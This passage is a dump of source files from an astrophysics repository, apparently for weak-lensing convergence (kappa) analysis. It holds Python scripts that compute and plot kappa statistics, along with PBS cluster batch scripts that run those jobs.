color='m',transform=ax.transAxes)\n#text(0.5, 0.5,'matplotlib',horizontalalignment='center',verticalalignment='center',transform = ax.transAxes)\n#plt.xlabel(r'$\\zeta_{gal}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=20)\nplt.xlabel(r'$\\kappa_\\mathrm{ext}$', fontsize=20)\nplt.tick_params(axis='x', labelsize=13)\nplt.tick_params(axis='y', labelsize=13)\nplt.setp(plt.xticks()[1], rotation=90)\nplt.legend(bbox_to_anchor=(0.30, 0.9), loc='center left', borderaxespad=0., fontsize=10)\n#plt.subplots_adjust(top=0.6)\n#plt.tight_layout()\nplt.savefig('%s' % output, dpi=500)\n#plt.show()\nprint 'Done!'\n\n\n" }, { "alpha_fraction": 0.7010309100151062, "alphanum_fraction": 0.8247422575950623, "avg_line_length": 96, "blob_id": "ee1e3cbebfc88a407d743ec7d9a2f76928eeb1c6", "content_id": "08ecc4daddcaf7d13bcb4a030690c573bba6a8c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 776, "license_type": "no_license", "max_line_length": 96, "num_lines": 8, "path": "/python/scripts/NAOJ/script_extractMillennium8.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "python extractMillennium_Henriques.py GGL_los_8_7_0_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_7_1_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_7_2_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_7_3_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_7_4_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_7_5_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_7_6_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_7_7_N_4096_ang_4_Henriques2014_galaxies_on_plane\n" }, { 
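# A compact, hedged sketch of the annotated-histogram pattern used in kappaplotcustom.py above, with an assumed one-column input
# file (the real kappa catalogues differ). Note that np.median matches the "$\kappa_\mathrm{med}$" annotation more literally than
# the np.average used above; normed=1 is the Py2-era matplotlib keyword (modern versions use density=True).
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt

kappa = np.loadtxt('kappa_example.dat')  # hypothetical single-column list of kappa values
ax = plt.subplot(111)
ax.hist(kappa, histtype='step', color='b', linewidth=1, normed=1, bins=100, range=[-0.05, 0.2])
s = r'$\kappa_\mathrm{med}$=%.3f, $N_\mathrm{LOS}$=%d' % (np.median(kappa), len(kappa))
ax.text(0.3, 0.75, s, fontsize=15, color='b', transform=ax.transAxes)
ax.set_xlabel(r'$\kappa_\mathrm{ext}$', fontsize=20)
ax.set_ylabel('Normalized cnts', fontsize=20)
plt.savefig('kappa_example.eps', dpi=500)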
"alpha_fraction": 0.658695638179779, "alphanum_fraction": 0.79347825050354, "avg_line_length": 45.04999923706055, "blob_id": "e728b818b3645f748dbb6796935ef2d38887cb7c", "content_id": "f1c894267e42041bae8dfd3d2d593188a3d9ca14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 920, "license_type": "no_license", "max_line_length": 176, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim2new.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n##PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Log2.out\n#PBS -e Log2.err\n#PBS -N 2\n#PBS -l mem=30gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython inferkappa_unbiasedwithshear45and120FITSio.py J1206 -1.0 -1.0 removegrouphandpicked fiducial notempty 5 23 measured med 120_gal 120_gamma 120_oneoverr 45_gal 45_oneoverr\npython inferkappa_unbiasedwithshear45and120FITSio.py J1206 -1.0 -1.0 removegrouphandpicked fiducial notempty 5 23 measured med 120_gal 120_gamma 120_zoverr 45_gal 45_zoverr\npython inferkappa_unbiasedwithshear45and120FITSio.py J1206 -1.0 -1.0 removegrouphandpicked fiducial notempty 5 24 measured med 120_gal 120_gamma 120_oneoverr 45_gal 45_oneoverr\npython inferkappa_unbiasedwithshear45and120FITSio.py J1206 -1.0 -1.0 removegrouphandpicked fiducial notempty 5 24 measured med 120_gal 120_gamma 120_zoverr 45_gal 45_zoverr" }, { "alpha_fraction": 0.6660482287406921, "alphanum_fraction": 0.771799623966217, "avg_line_length": 25.950000762939453, "blob_id": "5288d7dca7ed1a5dfcb523dafba4cdbbfb84bbcd", "content_id": "4cf1ef411ba549d84229c1bb5066c1e7a44c20b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 539, "license_type": "no_license", "max_line_length": 75, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim28.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log28s.out\n#PBS -e Log28s.err\n#PBS -N 28s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal oneoverr mass2rms\npython inferkappasimbias.py WFI2033 5 120 23 meds gal oneoverr mass2rms\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal oneoverr mass2rms\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal oneoverr mass2rms\n" }, { "alpha_fraction": 0.6600984930992126, "alphanum_fraction": 0.743842363357544, "avg_line_length": 26.066667556762695, "blob_id": "1c30db6420cc6f0ea7e390a9612483306cdc5401", "content_id": "7c7a02f8584be0c7852edc8940c05cfcdf10edd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 406, "license_type": "no_license", "max_line_length": 79, "num_lines": 15, "path": "/python/modeling_utilities/glaficextend_extractwithhead.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Header manupulation\n\nfrom astropy.io import fits\n\nimage0 = fits.open('../../F125W_visit1_highres_drz_sci_cut.fits')\ndata0 = image0[0].data\nhead0 = image0[0].header\n\nimage1 = fits.open('glafic125_1_extendSIEgamma_image.fits')\ndata1 = image1[0].data[5]\n\nimage2 = image0\nimage2[0].header = head0\nimage2[0].data = data0 - 
data1\nimage2.writeto('glafic125_1_extendSIEgamma_image_subtract.fits',overwrite=True)\n" }, { "alpha_fraction": 0.6352829337120056, "alphanum_fraction": 0.7874464988708496, "avg_line_length": 62.727272033691406, "blob_id": "68fd055623d09d5bd8aaf9d312af6818a4a2a71d", "content_id": "e007705f1ae5f006e8daf312d8ca30ebc13cf63b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2103, "license_type": "no_license", "max_line_length": 117, "num_lines": 33, "path": "/python/scripts/NAOJ/batch7_insertstars.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1\n#PBS -o Logb7.out\n#PBS -e Logb7.err\n#PBS -N 7\n#PBS -l mem=11gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_1_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_2_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_3_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_4_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_5_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_6_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_7_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_0_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_1_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_2_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_3_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_4_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_5_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_6_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_7_7_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\n" }, { "alpha_fraction": 0.7120226621627808, "alphanum_fraction": 0.7641628384590149, "avg_line_length": 93.37623596191406, "blob_id": "b1ccf00e5d4e7cbb6595ff7ce6ee6246442fbe56", "content_id": "5b9c51bbfdb37968d7fdcde4e855ee679ff10765", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9532, "license_type": "no_license", "max_line_length": 850, "num_lines": 101, "path": "/python/catalogue_utilities/plotkappabiascompletestatistics.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code computes medians and 184h, 84th percentiles from all the unbiased kappa files\n# Run as python plotkappabiascompletecompute.py WFI2033 5 23 45\n\nimport scipy as sp\nfrom scipy.stats import 
norm\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n\nlens = str(sys.argv[1])\ninner = str(sys.argv[2])\nmag = str(sys.argv[3])\nrad = str(sys.argv[4])\n\nroot = \"/Users/eduardrusu/Dropbox/Davis_work/code/GOODCODE/WFI2033kappa/\"\n\ndef compute(kappa_counts_):\n if np.median(kappa_counts_[4]) > 2:\n median = np.median(kappa_counts_[1] - kappa_counts_[0])\n std = (np.percentile(kappa_counts_[1] - kappa_counts_[0],84) - np.percentile(kappa_counts_[1] - kappa_counts_[0],16))/2.0\n else: median = float('nan'); std = float('nan');\n print np.median((kappa_counts_[3] - kappa_counts_[2])/2.0),np.median(kappa_counts_[4])\n return median, std\n\nkappa_counts1 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts1_gal = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts1_galgamma = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts2 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_z_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts2_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_z_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts3 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts3_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_mass_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts4 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts4_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_mass2_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts5 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts5_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_mass3_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts6 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts7 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_zoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts7_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_zoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts8 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_massoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts8_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_massoverr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts9 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2overr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), 
unpack=True)\nkappa_counts9_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_mass2overr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts10 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3overr_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts10_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_mass3overrrms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts11 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2rms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts11_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_mass2rms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts12 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3rms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts12_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_mass3rms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts13 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2overrrms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts13_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_mass2overrrms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts14 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3overrrms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts14_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_mass3overrrms_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts15 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_flexion_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts15_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_flexion_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts16 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_tidal_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts16_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_tidal_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts17 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_SIS_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts17_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_SIS_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts18 = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_gamma_oneoverr_SIShalo_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts18_ = np.loadtxt(\"%skappasimbias_%s_%sinnermask_nobeta_gal_oneoverr_SIShalo_%s_%s_meds_8of64fields_increments.cat\" % (root,lens,inner,mag,rad), unpack=True)\n\nmedian1,stddev1 = compute(kappa_counts1)\nmedian1_gal,stddev1_gal = compute(kappa_counts1_gal)\nmedian1_galgamma,stddev1_galgamma = compute(kappa_counts1_galgamma)\nmedian2,stddev2 = 
compute(kappa_counts2)\nmedian2_,stddev2_ = compute(kappa_counts2_)\nmedian3,stddev3 = compute(kappa_counts3)\nmedian3_,stddev3_ = compute(kappa_counts3_)\nmedian4,stddev4 = compute(kappa_counts4)\nmedian4_,stddev4_ = compute(kappa_counts4_)\nmedian5,stddev5 = compute(kappa_counts5)\nmedian5_,stddev5_ = compute(kappa_counts5_)\nmedian6,stddev6 = compute(kappa_counts6)\nmedian7,stddev7 = compute(kappa_counts7)\nmedian7_,stddev7_ = compute(kappa_counts7_)\nmedian8,stddev8 = compute(kappa_counts8)\nmedian8_,stddev8_ = compute(kappa_counts8_)\nmedian9,stddev9 = compute(kappa_counts9)\nmedian9_,stddev9_ = compute(kappa_counts9_)\nmedian10,stddev10 = compute(kappa_counts10)\nmedian10_,stddev10_ = compute(kappa_counts10_)\nmedian11,stddev11 = compute(kappa_counts11)\nmedian11_,stddev11_ = compute(kappa_counts11_)\nmedian12,stddev12 = compute(kappa_counts12)\nmedian12_,stddev12_ = compute(kappa_counts12_)\nmedian13,stddev13 = compute(kappa_counts13)\nmedian13_,stddev13_ = compute(kappa_counts13_)\nmedian14,stddev14 = compute(kappa_counts14)\nmedian14_,stddev14_ = compute(kappa_counts14_)\nmedian15,stddev15 = compute(kappa_counts15)\nmedian15_,stddev15_ = compute(kappa_counts15_)\nmedian16,stddev16 = compute(kappa_counts16)\nmedian16_,stddev16_ = compute(kappa_counts16_)\nmedian17,stddev17 = compute(kappa_counts17)\nmedian17_,stddev17_ = compute(kappa_counts17_)\nmedian18,stddev18 = compute(kappa_counts18)\nmedian18_,stddev18_ = compute(kappa_counts18_)\n\nhead = \"median_1+1/r+ median_1+1/r+gamma+ std_1+1/r+ std_1+1/r+gamma+ \"\nnp.savetxt('%skappacomputebias_%s_%s_%s_%s.lst' % (root,lens,inner,mag,rad),np.c_[np.array([median1_gal,median2_,median3_,median4_,median5_,median6,median7_,median8_,median9_,median10_,median11_,median12_,median13_,median14_,median15_,median16_,median17_,median18_]),np.array([median1_galgamma,median2,median3,median4,median5,median1,median7,median8,median9,median10,median11,median12,median13,median14,median15,median16,median17,median18]),np.array([stddev1_gal,stddev2_,stddev3_,stddev4_,stddev5_,stddev6,stddev7_,stddev8_,stddev9_,stddev10_,stddev11_,stddev12_,stddev13_,stddev14_,stddev15_,stddev16_,stddev17_,stddev18_]),np.array([stddev1_galgamma,stddev2,stddev3,stddev4,stddev5,stddev1,stddev7,stddev8,stddev9,stddev10,stddev11,stddev12,stddev13,stddev14,stddev15,stddev16,stddev17,stddev18])],fmt='%s',delimiter='\\t',newline='\\n',header=head)\n" }, { "alpha_fraction": 0.5728632211685181, "alphanum_fraction": 0.6058915257453918, "avg_line_length": 36.655460357666016, "blob_id": "6e8d944eeaf82650ebd328918079c18fcd44b2e1", "content_id": "402a3e11b55d73f3831307cf0be6d5f67413586e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4481, "license_type": "no_license", "max_line_length": 199, "num_lines": 119, "path": "/python/catalogue_utilities/kappaforKen.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Produces a normalized distribution with the kappa axis attached. 
The third axis is the smooth distribution\n\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\n\nmin_kappa = -0.10\nmax_kappa = 1\nbin_stat = 2000\nhalfwidth = (max_kappa - min_kappa) / (bin_stat * 2.0)\n\n#root = \"/Users/cerusu/Dropbox/\"\nroot = \"/Volumes/LaCieSubaru/kapparesults/\"\n\ndef statistics(kappa_all_,bin_stat_,min_kappa_,max_kappa_):\n    a, kappa_values = np.histogram([0], bins = bin_stat_, range=(min_kappa_,max_kappa_)) # create an empty histogram of the correct shape\n\n    sum = np.sum(kappa_all_)\n    #meanX = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth)) / sum\n    #meanX2 = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth) ** 2) / sum\n    #std = np.sqrt(meanX2 - meanX**2)\n    \n    med = 0\n    i = 0\n    ok = False\n    while (med <= sum/2.0) and (ok == False):\n        med = med + kappa_all_[i]\n        if med > sum/2.0:\n            median = kappa_values[i] + halfwidth\n            ok = True\n        if med == sum/2.0:\n            median = kappa_values[i] + 2 * halfwidth\n            ok = True\n        i = i + 1\n    \n    std = 0\n    ok = False\n    i = 0\n    while (std <= sum * 0.16) and (ok == False):\n        std = std + kappa_all_[i]\n        if std > sum * 0.16:\n            std1_ = kappa_values[i] + halfwidth\n            ok = True\n        if med == sum*0.16:\n            std1_ = kappa_values[i] + 2 * halfwidth\n            ok = True\n        i = i + 1\n    \n    std = 0\n    ok = False\n    i = 0\n    while (std <= sum*0.84) and (ok == False):\n        std = std + kappa_all_[i]\n        if std > sum*0.84:\n            std1 = kappa_values[i] + halfwidth\n            ok = True\n        if med == sum*0.84:\n            std1 = kappa_values[i] + 2 * halfwidth\n            ok = True\n        i = i + 1\n    \n    stddev = (std1 - std1_) / 2\n    \n    return median,stddev,kappa_values\n\ndef smooth(x,window_len=11,window='hanning'):\n    \"\"\"smooth the data using a window with requested size.\n\n    This method is based on the convolution of a scaled window with the signal.\n    The signal is prepared by introducing reflected copies of the signal\n    (with the window size) in both ends so that transient parts are minimized\n    in the beginning and end part of the output signal.\n    \n    input:\n        x: the input signal\n        window_len: the dimension of the smoothing window; should be an odd integer\n        window: the type of window from 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\n            flat window will produce a moving average smoothing.\n    \n    output: the smoothed signal\n\n    see also:\n    \n    numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve\n    scipy.signal.lfilter\n    \n    TODO: the window parameter could be the window itself if an array instead of a string\n    NOTE: length(output) != length(input), to correct this: return y[(window_len/2-1):-(window_len/2)] instead of just y.\n    \"\"\"\n    \n    if x.ndim != 1:\n        raise ValueError, \"smooth only accepts 1 dimension arrays.\"\n    if not window in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:\n        raise ValueError, \"Window is one of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\"\n    if x.size < window_len:\n        raise ValueError, \"Input vector needs to be bigger than window size.\"\n\n    if window_len<3:\n        return x\n    s=np.r_[x[window_len-1:0:-1],x,x[-2:-window_len-1:-1]]\n    if window == 'flat': #moving average\n        w=np.ones(window_len,'d')\n    else:\n        w=eval('np.'+window+'(window_len)')\n    y=np.convolve(w/w.sum(),s,mode='valid')\n    return y\n\nkappa = np.loadtxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap-1.0_-1.0_chameleon_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_23_meds_increments2_2_2_2_2.cat\" % root, usecols=[0], unpack=True)\nmedian,stddev,kappa_values = statistics(kappa,bin_stat,min_kappa,max_kappa)\nkappa = kappa / np.sum(kappa * 
np.abs((kappa_values[:-1]+halfwidth)))\n\nwinlen = 12\n#smooth(kappa_3,winlen,'flat')\n#smooth(kappa_3,winlen,'hanning')\n#smooth(kappa_3,winlen,'hamming')\n#smooth(kappa_3,winlen,'bartlett')\n#smooth(kappa_3,winlen,'blackman')\ndata = np.c_[kappa_values[:-1],kappa,smooth(kappa,winlen,'flat')[(winlen/2-1):-(winlen/2)]]\nnp.savetxt('%skappaforKen_WFI2033_5innermask_nobeta_zgap-1.0_-1.0_chameleon_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_23_meds_increments2_2_2_2_2.cat' % root, data, fmt='%.4f %.3e %.3e')\n" }, { "alpha_fraction": 0.5834031701087952, "alphanum_fraction": 0.7443419694900513, "avg_line_length": 48.70833206176758, "blob_id": "f3f346bcf1cfadd601b142e9486dc9567290f770", "content_id": "11c121075ebf30581a6660606d216c43353f8652", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1193, "license_type": "no_license", "max_line_length": 120, "num_lines": 24, "path": "/python/scripts/NAOJ/batch2_insertstars_.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb2_.out\n#PBS -e Logb2_.err\n#PBS -N 2_\n#PBS -l mem=15gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f 22.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_1_N_4096_ang_4_rays_to_plane_34_f 22.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_2_N_4096_ang_4_rays_to_plane_34_f 22.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_3_N_4096_ang_4_rays_to_plane_34_f 22.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_4_N_4096_ang_4_rays_to_plane_34_f 22.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_5_N_4096_ang_4_rays_to_plane_34_f 22.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_6_N_4096_ang_4_rays_to_plane_34_f 22.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_7_N_4096_ang_4_rays_to_plane_34_f 22.5 120 measured 5 -1 -1\n" }, { "alpha_fraction": 0.5772050023078918, "alphanum_fraction": 0.6409316658973694, "avg_line_length": 44.71891784667969, "blob_id": "386ac8c0f26c38475d8d94105938beb187443ca6", "content_id": "fdd48be3cb4c5e6db5abe6cfb59b2b92dfb6471e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8458, "license_type": "no_license", "max_line_length": 201, "num_lines": 185, "path": "/python/plot_utilities/plotkappa_test.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Plots the equivalent of Figure 13 in Rusu et al. 
